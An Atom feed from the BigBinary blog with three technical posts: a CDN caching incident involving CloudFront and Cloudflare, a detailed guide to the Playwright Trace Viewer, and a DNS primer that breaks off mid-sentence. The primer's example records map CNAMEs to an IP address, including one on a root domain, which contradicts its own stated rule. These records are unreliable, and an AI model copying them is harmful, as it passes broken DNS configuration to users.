<?xml version="1.0" encoding="utf-8"?>
    <feed xmlns="http://www.w3.org/2005/Atom">
     <title>BigBinary Blog</title>
     <link href="https://www.bigbinary.com/feed.xml" rel="self"/>
     <link href="https://www.bigbinary.com/"/>
     <updated>2026-03-08T07:43:58+00:00</updated>
     <id>https://www.bigbinary.com/</id>
     <entry>
       <title><![CDATA[CDN caching issue involving Cloudfront and Cloudflare]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/cdn-caching-issue-involving-cloudfront-and-cloudflare"/>
      <updated>2026-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cdn-caching-issue-involving-cloudfront-and-cloudflare</id>
      <content type="html"><![CDATA[<p>Recently, some <a href="https://neeto.com">Neeto</a> customers reported experiencing a verylong page load time. For some of them, the page didn't even load. We found thatthe issue is related to CDN caching.</p><p>Neeto uses React.js for the front-end code, and the asset files are hosted atCloudFront. To complicate matters, we use CloudFlare as our DNS resolver.Between CloudFlare and Cloudfront, we were not sure what was being cached and atwhat level. Since this problem was being faced only by our customers, it was abit difficult to reproduce and debug.</p><p>The whole setup is like this:</p><ul><li>Browsers make requests to https://cdn.neetox.com/assets/xyz.js</li><li>Clouflare forwards the request to Cloudfront</li><li>CloudFront acting as the caching layer will try to get the data from theNeetoDeploy server and will cache the result</li></ul><p>If the browser is not getting the requested file, then in this chain, something didn'twork correctly.</p><p>During the investigation, we found that Cloudflare was being a bit mischievousand was doing things it should not be doing. Watch the video to see what I mean.</p><p>The video mentioned below is the one I created for the internal Neeto folks. Thevideo is being published <strong>as-is</strong> without any modifications.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/_TCU14fN08A?si=Xy_o6cpSjGvsFFCm&quot;title=&quot;CDN caching issue involving Cloudfront and Cloudflare&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot;referrerpolicy=&quot;strict-origin-when-cross-origin&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>You can see the transcript of the video<a href="https://unni.neetorecord.com/watch/e4c66b38fc57e395fd84">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to analyze Playwright traces]]></title>
       <author><name>Deepanshu Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-analyze-playwright-traces"/>
      <updated>2026-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-analyze-playwright-traces</id>
      <content type="html"><![CDATA[<p>Playwright traces are like flight recorders for your tests - they capture everyaction, network request, DOM snapshot, and console log during test execution.When a test fails, especially in CI environments, traces become the mostpowerful debugging tool, providing a complete timeline of what happened and why.</p><p>We learned so much about Playwright traces while adding the Playwright's tracingcapabilities to <a href="https://neeto.com/playdash">NeetoPlaydash</a>. We builtNeetoPlaydash and it is the most affordable Playwright Dashboard. NeetoPlaydashcollects, monitors and debugs Playwright test reports.</p><h2>What are Playwright traces?</h2><p>Playwright traces are compressed archives (<code>.zip</code> files) that contain:</p><ul><li><strong>Complete DOM snapshots</strong> before, during, and after each action.</li><li><strong>Screenshots</strong> of the browser state at every step.</li><li><strong>Network activity</strong>, including all HTTP requests and responses.</li><li><strong>Console logs</strong> from both the browser and your test.</li><li><strong>Action timeline</strong> showing what your test did and when.</li><li><strong>Source code</strong> mapping actions back to your test files.</li><li><strong>Metadata</strong> about the test environment, browser, and configuration.</li></ul><p>Think of traces as a time machine for test execution - we can pause at anymoment and see exactly what the browser looked like, what network calls were inflight, and what our code was doing.</p><h2>What is the Trace Viewer?</h2><p>The Trace Viewer is an application used to view and analyze the informationcollected in trace files. Traces are information collected into a zip fileduring test execution. The Trace Viewer makes sense of and displays thisinformation in an interactive interface.</p><p>We can view traces in two ways:</p><ul><li><strong>Locally</strong> - Using the Trace Viewer app that ships with Playwright (via thePlaywright CLI).</li><li><strong>Online</strong> - By visiting <a href="https://trace.playwright.dev/">trace.playwright.dev</a>and uploading our trace file.</li></ul><p>Both methods provide the same powerful debugging experience, allowing us tonavigate through our test execution, inspect DOM snapshots, analyze networkrequests, and debug failures.</p><h2>Understanding the Trace Viewer interface</h2><p>One can download a<a href="/blog_images/how_to_analyze_playwright_traces/sample-trace.zip">sample trace file</a>to follow along with this blog. We can also view it directly in the<a href="https://trace.playwright.dev/">Trace Viewer</a>.</p><p>The Trace Viewer interface is divided into several key areas that work togetherto help us debug your tests.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/trace-viewer-overview.png" alt="Trace Viewer Overview"></p><h3>1. Action Timeline (Top)</h3><p>A visual filmstrip showing screenshots of our test execution over time. We can:</p><ul><li><strong>Hover</strong> to see magnified previews.</li><li><strong>Click</strong> to jump to specific moments.</li><li><strong>Double-click</strong> an action to focus on its time range.</li><li><strong>Drag</strong> to select a range of actions for filtering.</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/action-timeline.png" alt="Action Timeline"></p><h3>2. The Actions Tab: Our test execution timeline</h3><p>The Actions tab is typically our starting point. Each action shows:</p><ul><li><strong>Duration anomalies</strong> - Actions taking unusually long suggest performanceissues or waiting problems.</li><li><strong>Locator information</strong> - Verify that we are targeting the correct elements.</li><li><strong>Action sequence</strong> - Ensure actions execute in the expected order.</li><li><strong>Red/failed actions</strong> - These are our primary debugging targets.</li></ul><p>Hover over each action to see the DOM highlight change in real-time. This helpsverify that Playwright is interacting with the correct element.</p><p><strong>Example:</strong></p><pre><code> page.goto(&quot;https://app.neetocal.com&quot;) - 1.2s page.getByTestId(&quot;login-button&quot;).click() - 0.3s page.getByTestId(&quot;email-input&quot;).fill(&quot;test@example.com&quot;) - 30s TIMEOUT</code></pre><p>Here, the fill action timed out. Select the action and use the <strong>Before</strong> and<strong>After</strong> tabs above the main snapshot viewing area to see why the elementwasn't available.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/actions-tab.png" alt="Actions Tab"></p><h3>3. Metadata Tab: Environment context</h3><p>The <strong>Metadata</strong> section provides high-level contextual information about thetest execution environment and run characteristics. This information helps inunderstanding <em>when</em>, <em>how</em>, and <em>under what conditions</em> the trace was recorded.</p><ul><li><strong>Time:</strong> Displays the start time, end time, and total duration of the test.</li><li><strong>Browser:</strong> Displays the browser (e.g., Chromium, Firefox, WebKit), platform,and user agent used during the test run.</li><li><strong>Config:</strong> Shows the Playwright configuration applied for the run. Includesrelevant settings such as test options, retries, timeouts, and project-leveloverrides.</li><li><strong>Viewport:</strong> Specifies the viewport dimensions used during execution. Helpsdiagnose layout, responsiveness, and visual issues tied to screen size.</li><li><strong>Counts (Metrics):</strong> Summarizes key execution metrics captured in the trace,such as:<ul><li><strong>Pages</strong> - Pages captured during the trace.</li><li><strong>Actions</strong> - Actions performed during the test.</li><li><strong>Events</strong> - Runtime events logged during execution.</li></ul></li></ul><p>This is particularly useful when:</p><ul><li>Tests pass locally but fail in CI.</li><li>Tests behave differently across browsers.</li><li>Issues are viewport-specific (responsive design bugs).</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/metadata-tab.png" alt="Metadata Tab"></p><h3>4. Main Content Area (Center)</h3><p>The <strong>Main Content Area</strong> is the primary visual workspace of the Trace Viewer.It displays detailed, interactive views of the application state for theselected action, enabling precise inspection and debugging.</p><h4>Pick Locator</h4><p>Allows us to interactively select elements directly from the snapshot.Automatically generates the corresponding Playwright locator, helping validateselectors and improve test reliability.</p><h4>Snapshots: Time-Travel Debugging</h4><p>Snapshots capture the complete DOM state at three critical moments:</p><ul><li><strong>Action</strong> - The exact moment of interaction (showing the precise clickcoordinates or input position with a red dot).</li><li><strong>Before</strong> - State when the action was called.</li><li><strong>After</strong> - State after the action is completed.</li></ul><p><strong>Using snapshots effectively:</strong></p><ul><li><strong>Compare Before/After</strong> to see what changed.</li><li><strong>Inspect element visibility</strong> - Was the element actually visible andinteractable?</li><li><strong>Check for overlays</strong> - Are modals, loading spinners, or other elementsblocking interaction?</li><li><strong>Verify element state</strong> - Is the button disabled? Is the input read-only?</li></ul><p><strong>Debugging technique:</strong> When a click fails, examine the highlighted clickposition in the Action snapshot. If it's not where we expect, we may have:</p><ul><li>Multiple elements matching your locator (strict mode violation).</li><li>An element that moved during Playwright's auto-wait.</li><li>An element obscured by another element (z-index issues).</li></ul><h4>Open Snapshot in a New Tab</h4><p>Opens the current DOM snapshot in a separate browser tab. Useful for deepinspection, side-by-side comparison, or analyzing complex layouts without losingtrace context.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/main-content-area.png" alt="Main Content Area"></p><h3>5. Tab Bar (Bottom/Right)</h3><h4>Locator Tab</h4><p>This is useful to get the locator of any element. Click the Locator button andhover over any component in the snapshot; the locator for that element willappear in the code space below the button. The reverse is also possible - typinga locator in the code space will highlight the corresponding element in the maincontent area, making it easy to verify locators and test selectors.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/locator-tab.png" alt="Locator Tab"></p><h4>Call Tab: Action details</h4><p>The Call tab provides granular information about each action:</p><ul><li><strong>Function signature</strong> - The exact Playwright method called.</li><li><strong>Parameters</strong> - Arguments passed to the function.</li><li><strong>Locator string</strong> - How Playwright found the element.</li><li><strong>Strict mode</strong> - Whether strict mode was enforced.</li><li><strong>Timeout</strong> - Maximum wait time configured.</li><li><strong>Return value</strong> - The resolved value of the Playwright function call.</li></ul><p><strong>Example:</strong></p><pre><code class="language-javascript">await expect(page.getByTestId(&quot;publish-btn&quot;)).toBeDisabled({ timeout: 10_000 });</code></pre><p>The corresponding details would show the function signature, parameters, andexecution result.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/call-tab.png" alt="Call Tab"></p><h4>Log Tab: Playwright's internal actions</h4><p>The Log tab reveals what Playwright does behind the scenes. ContainsPlaywright-generated internal logs for the selected action. Provides insightinto retries, waiting behavior, timeouts, and internal decision-making.</p><pre><code> waiting for getByTestId('submit-button'). locator resolved to &lt;button&gt;Submit&lt;/button&gt;. scrolling element into view if needed. waiting for element to be visible. waiting for element to be enabled. waiting for element to be stable. waiting for element to receive pointer events. performing click action. click action completed.</code></pre><p><strong>Why this matters:</strong> Understanding Playwright's auto-wait mechanism helps us infollowing areas:</p><ul><li>Identify which wait condition failed.</li><li>Optimize your locators.</li><li>Add appropriate waits when auto-wait isn't sufficient.</li><li>Debug flaky tests caused by race conditions.</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/log-tab.png" alt="Log Tab"></p><h4>Errors Tab: Failure analysis</h4><p>When tests fail, the Errors tab is our first stop. It shows:</p><ul><li>Error messages with stack traces.</li><li>Playwright's failure reason.</li><li>Timeout information.</li><li>Expected vs. actual states (for assertions).</li></ul><p><strong>The timeline also highlights errors</strong> with a red vertical line, making it easyto see when things went wrong. Lists errors and exceptions associated with theaction or test step. Includes failure messages, stack traces, and error types toquickly identify what went wrong.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/errors-tab.png" alt="Errors Tab"></p><h4>Console Tab: Browser and test logs</h4><p>The Console tab shows all console output, including:</p><ul><li><code>console.log</code>, <code>console.error</code>, <code>console.warn</code> from our application.</li><li>Browser warnings and errors.</li><li>Test framework logs.</li><li>Playwright's internal logs.</li></ul><p><strong>Visual indicators:</strong></p><ul><li>Different icons distinguish between browser console logs and test logs.</li><li>Error messages are highlighted in red.</li><li>Warnings appear in yellow.</li></ul><p><strong>Filtering console logs:</strong> Double-click an action in the sidebar to filterconsole logs to only that action's timeframe. This is crucial when dealing withverbose applications.</p><p><strong>Common patterns to look for:</strong></p><pre><code class="language-javascript">// React errorsWarning: Can't perform a React state update on an unmounted component// Network errorsFailed to load resource: the server responded with a status of 404// Application errorsUncaught TypeError: Cannot read property 'id' of undefined// CORS issuesAccess to fetch at 'https://api.example.com' has been blocked by CORS policy</code></pre><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/console-tab.png" alt="Console Tab"></p><h4>The Network Tab: API and resource investigation</h4><p>The Network tab is invaluable for debugging issues related to:</p><ul><li>API failures.</li><li>Slow page loads.</li><li>Missing resources.</li><li>Authentication problems.</li></ul><p><strong>Key columns:</strong></p><ul><li><strong>Method</strong> (GET, POST, PUT, DELETE, etc.)</li><li><strong>URL</strong> (full request path)</li><li><strong>Status</strong> (200, 404, 500, etc.)</li><li><strong>Content Type</strong> (application/json, text/html, etc.)</li><li><strong>Duration</strong> (request time)</li><li><strong>Size</strong> (response size)</li></ul><p><strong>Filtering network requests:</strong></p><ul><li>Use the timeline to select a specific action range.</li><li>The network tab automatically filters to show only requests during thatperiod.</li></ul><p><strong>What to investigate:</strong></p><pre><code> GET /api/auth/session - 200 - 45ms - application/json POST /api/bookings/create - 500 - 2.1s - application/json GET /api/user/profile - 200 - 89ms - application/json</code></pre><p>The 500 error on the booking creation is our culprit. Click on it to see:</p><ul><li><strong>Request headers</strong> - Is authentication included (CSRF token)?</li><li><strong>Request body</strong> - Is the payload correct?</li><li><strong>Response headers</strong> - Any CORS issues?</li><li><strong>Response body</strong> - What error message did the server return?</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/network-tab.png" alt="Network Tab"></p><h4>Source Tab: Connecting traces to code</h4><p>The Source tab displays our test code and highlights the exact linecorresponding to the selected action. This is crucial for:</p><ul><li>Understanding what your test was trying to do.</li><li>Verifying locators and test logic.</li><li>Jumping between test code and execution results.</li></ul><p><strong>Workflow:</strong></p><ol><li>Click an action in the sidebar.</li><li>Source tab automatically shows the relevant code line.</li><li>Review the locator, expected behavior, and assertions.</li><li>Cross-reference with the DOM snapshot to verify assumptions.</li></ol><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/source-tab.png" alt="Source Tab"></p><h4>Attachments Tab: Visual regression and screenshots</h4><p>For tests using visual comparisons or custom attachments, this tab shows:</p><ul><li><strong>Screenshot comparisons</strong> (expected, actual, diff)</li><li><strong>Image slider</strong> to overlay images and spot differences</li><li><strong>Custom attachments</strong> added via <code>test.attach()</code></li><li><strong>Screenshots</strong> &amp; <strong>Video recordings</strong> (if configured)</li></ul><p><strong>Visual regression workflow:</strong></p><ol><li>Navigate to the Attachments tab.</li><li>View the diff image, highlighting differences in red.</li><li>Use the slider to compare expected vs. actual.</li><li>Determine if changes are legitimate or bugs.</li></ol><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/attachments-tab.png" alt="Attachments Tab"></p><h2>Advanced debugging techniques</h2><h3>1. Time-Range filtering for complex tests</h3><p>For long-running tests with many actions:</p><ol><li>Click a starting point on the timeline.</li><li>Drag to an ending point.</li><li>All tabs (Actions, Network, Console) filter to this range.</li><li>Focus your investigation on the relevant portion.</li></ol><h3>2. Network request correlation</h3><p>When debugging API-dependent tests:</p><ol><li>Find the failing action.</li><li>Check the Network tab for API calls during that action.</li><li>Verify request/response timing.</li><li>Ensure data contracts match expectations.</li></ol><p><strong>Example investigation:</strong></p><pre><code>Test: User creates a booking.Action: page.click(&quot;button[type=submit]&quot;).Network: POST /api/bookings/create - 400 Bad Request.Response: {&quot;error&quot;: &quot;Invalid time slot&quot;}.Conclusion: Form validation passed, but the API rejected the data.Next step: Check whether the time slot selection logic has a bug.</code></pre><h3>3. Console error causation</h3><p>Browser console errors often precede test failures:</p><ol><li>Review the Console tab chronologically.</li><li>Look for errors before the failing action.</li><li>JavaScript errors may prevent event handlers from working.</li><li>Network errors may leave the UI in an invalid state.</li></ol><h3>4. Locator strategy validation</h3><p>When the element isn't found:</p><ol><li>Check the Before snapshot - is the element present?</li><li>Review the Call tab - is the locator correct?</li><li>Use browser DevTools on the snapshot to test alternative locators</li></ol><h3>5. Race condition detection</h3><p>Flaky tests often have race conditions:</p><ol><li>Compare traces from passed vs. failed runs.</li><li>Look for timing differences in the Network tab.</li><li>Check if elements appear/disappear between snapshots.</li></ol><h2>Common debugging scenarios</h2><h3>Scenario 1: &quot;Element Not Found&quot; errors</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Navigate to the failing click/fill action.</li><li>Examine the Before snapshot - is the element in the DOM?</li><li>Check the Console for JavaScript errors that might prevent rendering.</li><li>Review Network tab - did the page load completely?</li><li>Verify the locator in the Call tab matches the element you expect.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Element hasn't rendered yet (needs <code>waitForSelector</code>).</li><li>Wrong locator (typo, dynamic attributes).</li><li>Element is in a different frame/iframe.</li><li>Previous action failed, leaving UI in an unexpected state.</li></ul><h3>Scenario 2: &quot;Timeout Waiting for Element&quot; errors</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Check element visibility in the Before snapshot.</li><li>Look at the element's CSS properties (display, opacity, visibility).</li><li>Check for z-index issues or overlapping elements.</li><li>Review the Network tab for slow API responses blocking the UI.</li><li>Check the Console for loading state indicators.</li></ol><p><strong>Possible causes:</strong></p><ul><li>CSS hides the element.</li><li>Loading spinner still active.</li><li>API call hasn't completed.</li><li>Modal or overlay blocking interaction.</li><li>Element removed and re-added (Playwright lost reference).</li></ul><h3>Scenario 3: API failures causing test failures</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Filter the Network tab to the action's timeframe.</li><li>Find failed API requests (4xx, 5xx status codes).</li><li>Inspect request payload - is test data valid?</li><li>Check the response body for error details.</li><li>Verify authentication headers are present.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Test data doesn't match API validation rules.</li><li>Authentication token expired (X-CSRF token).</li><li>Database state inconsistent (previous test didn't clean up).</li><li>API endpoint changed (version mismatch).</li></ul><h3>Scenario 4: Tests pass locally but fail in CI</h3><p><strong>Trace analysis steps:</strong></p><p>Run the test locally as well and open the traces for both runs (local and CI):</p><ol><li>Compare the Metadata tab - check browser, viewport, timezone differences</li><li>Look for timing differences in action durations</li><li>Check for environment-specific console errors</li><li>Compare Network tab - are API endpoints different?</li></ol><p><strong>Possible causes:</strong></p><ul><li>Timezone-dependent test data.</li><li>Slower CI environment (needs longer timeouts).</li><li>Different environment variables.</li><li>Some other tests are affecting the test (very rare case).</li></ul><h3>Scenario 5: Flaky tests (Intermittent failures)</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Compare traces from multiple runs (passed and failed).</li><li>Look for timing variations in Network requests.</li><li>Check for race conditions between actions.</li><li>Review auto-wait logs for differences in element stability.</li><li>Look for animations or transitions affecting element states.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Race conditions between UI updates and test actions.</li><li>Async operations without proper waits.</li><li>Animations not completing before interaction.</li><li>Network request order is non-deterministic.</li><li>Shared test state between test runs.</li></ul><h2>Best practices for trace analysis</h2><h4>1. Start with the error</h4><p>Always begin at the point of failure. The Errors tab and red timeline markersguide you directly there.</p><h4>2. Trace backwards</h4><p>After identifying the error, trace back through the actions to determine itsroot cause, which may be linked to an event that occurred several steps earlier.</p><h4>3. Compare known-good traces</h4><p>If you have a passing trace, compare it side-by-side with the failing trace tospot differences quickly.</p><h4>4. Use timeline filtering liberally</h4><p>Don't drown in information. Filter the timeline to focus on relevant actions andreduce noise.</p><h4>5. Correlate across tabs</h4><p>True debugging power comes from correlating information across tabs:</p><ul><li>Action timing + Network requests + Console logs = complete picture</li></ul><h4>6. Document your findings</h4><p>When you identify the root cause, document it:</p><ul><li>Add comments to your test code.</li><li>Update test data or fixtures.</li><li>Fix race conditions with proper waits.</li><li>Report application bugs with trace evidence.</li></ul><h4>7. Configure appropriate trace collection</h4><p>In your <code>playwright.config.ts</code>:</p><pre><code class="language-typescript">export default defineConfig({  use: {    // Capture trace only on first retry (recommended for CI)    trace: &quot;on-first-retry&quot;,    // Or retain traces only for failures    // trace: 'retain-on-failure',    // For local debugging, enable traces for all tests    // trace: 'on',  },  // Enable retries to capture traces on failures  retries: process.env.CI ? 2 : 0,});</code></pre><h2>Trace Viewer keyboard shortcuts</h2><p>Speed up your analysis with these shortcuts:</p><ul><li><strong>Arrow keys</strong> - Navigate between actions.</li><li><strong>Esc</strong> - Clear selection/filtering.</li><li><strong>Ctrl/Cmd + F</strong> - Search within trace.</li></ul><h2>Accessing traces in NeetoPlaydash</h2><p><a href="https://neeto.com/neetoplaydash">NeetoPlaydash</a> is a test management platformthat integrates seamlessly with Playwright's tracing capabilities. When a testruns on CI, Playwright automatically generates trace files. To access them:</p><ol><li><strong>Navigate to NeetoPlaydash</strong> - Open your projects dashboard.</li><li><strong>Select a Test Run</strong> - Choose the test execution you want to investigate fora particular project.</li><li><strong>Open Test Details Pane</strong> - View the details of a specific test.</li><li><strong>Click &quot;Open Trace&quot;</strong> - This button launches the Trace Viewer with yourtest's trace file.</li></ol><p>The trace opens in your browser at <code>trace.playwright.dev</code> or locally via thePlaywright CLI, providing a complete, interactive debugging experience withoutrequiring manual file downloads.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/access-trace-neetoplaydash.png" alt="Access trace in NeetoPlaydash"></p><h2>Further resources</h2><ul><li><a href="https://playwright.dev/docs/trace-viewer">Playwright Trace Viewer Documentation</a></li><li><a href="https://playwright.dev/docs/best-practices">Playwright Best Practices</a></li><li><a href="https://playwright.dev/docs/debug">Debugging Playwright Tests</a></li><li><a href="https://trace.playwright.dev/">Online Trace Viewer</a></li><li><a href="https://courses.bigbinaryacademy.com/learn-qa-automation-using-playwright/">Learn QA Automation using Playwright Course</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[DNS basics and how DNS works in Neeto]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/dns-basics-and-how-dns-works-in-neeto"/>
      <updated>2026-01-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/dns-basics-and-how-dns-works-in-neeto</id>
      <content type="html"><![CDATA[<p>This blog started with an explanation of how DNS works in<a href="https://neeto.com">Neeto</a>. However we covered a lot of ground about how DNSactually works.</p><h1>The Basics of DNS Records</h1><p>A Domain Name System (DNS) is a hierarchical and decentralized naming system forcomputers and servers connected to the Internet. It essentially translateshuman-readable domain names into machine-readable IP addresses.</p><h2>What is a Domain Name?</h2><p>A Domain Name is a unique, human-friendly label used to identify one or more IPaddresses. It's what people type into a web browser to visit a website. Forexample, <code>google.com</code> and <code>wikipedia.org</code> are domain names.</p><h2>Purchasing a New Domain Name</h2><p>You don't buy a domain name outright. Technicall,y you register the right to useit for a specified period (typically 1 to 10 years) from a Domain NameRegistrar. These are called &quot;registrars&quot; because you are registering the rightto use the domain name.</p><p>Popular Domain Name Registrars are GoDaddy, Namecheap, Cloudflare and Porkbun.</p><h2>DNS Records: Types and Uses</h2><p>DNS Records provide information about a domain, primarily mapping hostnames toIP addresses. There are many different types of DNS records. We would be lookingat the important ones.</p><h3>A Record</h3><p>&quot;A record&quot; stands for &quot;Address record&quot;. It maps a domain name (like google.com)to an IPv4 address (like 93.184.216.34).</p><h3>AAAA Record</h3><p>This does exactly the same thing as A record but for the IPv6 address. Four Assignifies a bigger address range.</p><h3>CNAME Record</h3><p>&quot;CNAME record&quot; stands for &quot;Canonical Name Record&quot;.</p><p>Instead of pointing directly to an IP address like an A record does, a CNAMEpoints one hostname to another hostname.</p><p>An example of CNAME record could be: <code>blog.bigbinary.com</code> -&gt;<code>bigbinary.github.io</code>.</p><p>What CNAME is saying here is that if you are visiting <code>blog.bigbinary.com</code>, thenthis record doesn't have the IP address information. If you want an IP address,then ask for that info from <code>bigbinary.github.io</code>. Remember that IP addressesare provided by A and AAAA records.</p><p>Another way of looking at it is that an A record provides the IP address,while CNAME provides the address of the next machine to which we can ask for theIP address.</p><p>Please note that it is quite possible that the next machine might have anotherCNAME and that in turn might have another CNAME.</p><p>The main point is that CNAME keeps the record of the next machine to ask for. Inthe end, some machine has to have an A or AAAA record so that a domain is mappedto an IP address.</p><h3>MX Record</h3><p>&quot;MX Record&quot; stands for &quot;Mail Exchanger Record&quot;.</p><p>It specifies the mail servers responsible for accepting email messages on behalfof of a domain.</p><h3>TXT Record</h3><p>A TXT record (Text record) lets a domain owner store arbitrary text data in DNS.Other services then look up that text to verify ownership, check email policies,etc. Think of it like a sticky note that the domain owner can add for others toread.</p><p>Here are some use cases of the TXT record:</p><h4>Adding SPF records</h4><pre><code class="language-sh">bigbinary.com. IN TXT &quot;v=spf1 ip4:198.51.100.10 include:_spf.google.com -all&quot;</code></pre><h4>Domain verification</h4><p>Here is an example of site verification by Google Site.</p><pre><code class="language-sh">bigbinary.com. IN TXT &quot;google-site-verification=asduiashd9812h98asdh&quot;</code></pre><h4>Adding DMARC records</h4><pre><code class="language-sh">_dmarc.bigbinary.com. IN TXT &quot;v=DMARC1; p=reject; rua=mailto:dmarc@example.com&quot;</code></pre><h3>NS Record</h3><p>NS stands for &quot;Name servers&quot;.</p><p>Let's say that a user types in the URL <code>https://blog.neeto.com</code>. The job of theDNS system is to ultimately find an IP address to which the request can be sent.Now, let's think about how to go about searching for the IP address.</p><p>We need to ask some machine for more information about <code>blog.neeto.com</code>. Thatinformation could be a CNAME record, an A record, or a AAAA record. But theproblem is who should be asked. From where we start the journey.</p><p>That's where the NS record comes into the picture. Remember, each domain isregistered with a registrar. So that's where the DNS system starts the journey.First, DNS will ask the registrar of the domain, &quot;Hey, can you give me the Nameservers to whom I can start asking questions?&quot;</p><p>Let's take a practical case and execute the following command on the terminal:</p><pre><code class="language-sh">whois neeto.com</code></pre><p>We'll get a lot of data, but we want to concentrate on the following six lines:</p><pre><code class="language-sh">Domain Name: NEETO.COMRegistrar WHOIS Server: whois.cloudflare.comRegistrar: Cloudflare, Inc.Registrar URL: https://www.cloudflare.comName Server: BARBARA.NS.CLOUDFLARE.COMName Server: YEW.NS.CLOUDFLARE.COM</code></pre><p>We can see that the Registrar for neeto.com is &quot;Cloudflare&quot;. We also see thatthe Name servers are two servers, which are also <code>clouflare.com</code>. The people whodesigned name servers dictated that there should always be at least two nameservers. In this way, if one of them goes down for any reason, the overallsystem is still working.</p><p>Taking our example of <code>blog.neeto.com</code>, if we need a CNAME record, an A record,or a AAAA record, then we need to start asking those questions to these two nameservers.</p><p>Now let's do the same experiment with another domain. This time, we will choose<code>https://bigbinary.com</code>.</p><pre><code class="language-sh">whois bigbinary.com</code></pre><p>This time, we will get the following lines.</p><pre><code class="language-sh">Domain Name: BIGBINARY.COMRegistrar: GoDaddy.com, LLCRegistrar WHOIS Server: whois.godaddy.comRegistrar URL: http://www.godaddy.comName Server: BARBARA.NS.CLOUDFLARE.COMName Server: YEW.NS.CLOUDFLARE.COM</code></pre><p>Notice that this time the registrar is <code>GoDaddy</code>, but the Name servers are<code>cloudflare.com</code>. This is because <code>bigbinary.com</code> is registered with <code>GoDaddy</code>.When a domain is purchased from a registrar, the default values of the nameservers will point to the registrar's name servers. So after the initialregistration, <code>bigbinary.com</code> had the GoDaddy name servers, but has chosen notto use them. With the help of NS records, BigBinary has told GoDaddy thatBigBinary doesn't want to use GoDaddy's name servers and wants GoDaddy to usethe Cloudflare name servers. This will mean that all the future DNS records for<code>bigbinary.com</code> can be maintained in Cloudflare.</p><p>This goes on to show that one is not restricted to the name servers of theregistrars.</p><p>Name servers, just like CNAME records, never point to an IP address. They alwayspoint to another host name.</p><h2>Different parts of a URL</h2><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/different-parts-of-domain2.png" alt="Different parts of a URL"></p><h3>Protocol</h3><p>The protocol is the initial part that specifies the set of methods used fortransferring data between a web browser and a server. The server essentiallytells the browser how to communicate. The most common protocols are <code>http</code>(Hypertext Transfer Protocol) and its secure version <code>https</code> (Hypertext TransferProtocol Secure).</p><h4>Top-Level Domain (TLD)</h4><p>A Top-Level Domain (TLD) is the very last part of a domain name, located afterthe final dot.</p><p>For example, in google.com the <code>.com</code> is the Top-Level Domain (TLD). Common TLDsare <code>.com</code>, <code>.org</code>, <code>.net</code> etc.</p><h3>Subdomain</h3><p>A subdomain is a label that comes before the main part of a domain name.</p><p>For example, in the address blog.bigbinary.com the <code>blog</code> is the subdomain.</p><p>We can have <code>a.b.c.d.e.f.blog.bigbinary.com</code>. Technically upto 127 levels ofsubdomain is allowed.</p><h4>Root domain</h4><p>A root-level domain is the base name of a website. For example, in<code>www.google.com</code> the <code>.com</code> part is the TLD and <code>google.com</code> part is the rootlevel domain.</p><h3>Strange case of www subdomain</h3><p>Let's say that we registered a brand new domain called <code>spinjudo.com</code> withCloudflare. We have our marketing site up and running on Vercel, and we want tohost our blog on WordPress. So we will add these two DNS records.</p><p>For our marketing site, we will add a CNAME record something like this:</p><pre><code class="language-sh">spinjudo.com IN CNAME 76.76.21.21</code></pre><p>And then for the blog, we will add another CNAME record something like this:</p><pre><code class="language-sh">blog   IN   CNAME   domains.wordpress.com.</code></pre><p>So now both <code>https://spinjudo.com</code> and <code>https://blog.spinjudo.com</code> are working.</p><p>But what about <code>https://www.spinjudo.com</code>.</p><p>Developers often forget that users can type <code>https://spinjudo.com</code> or they canalso type <code>https://www.spinjudo.com</code>.</p><p>Time to time in your life, you might have come across cases where a site isworking only with <code>www</code> or only without <code>www</code>. That's because the developerseither took care of <code>www</code> and forgot to take care of the root domain or thedeveloper took care only of the root domain and not of <code>www</code>.</p><p>Technically, <code>www</code> is a subdomain and that needs to be taken care of too. Inthis case for <code>spinjudo.com</code> we need to add one more CNAME record for <code>www</code> andthat might look like this:</p><pre><code class="language-sh">www IN CNAME 76.76.21.21</code></pre><h2>Rules regarding CNAME records</h2><p>The first rule is that CNAME records can <strong>only</strong> be added to subdomains. Itmeans CNAMES can't be added to root domains. That's the rule.</p><p>However, some DNS providers allow a technique to bypass this rule. They providea different type of record called &quot;ANAME&quot; record which allows CNAME for rootdomains.</p><p>In general, we advise against using ANAME records.</p><p>The second rule is that if a subdomain has a CNAME record, then that subdomaincan't have any more records.</p><h2>Why do we need to wait for some time after updating the domain</h2><p>If you change anything related to DNS you are asked to wait 24 to 48 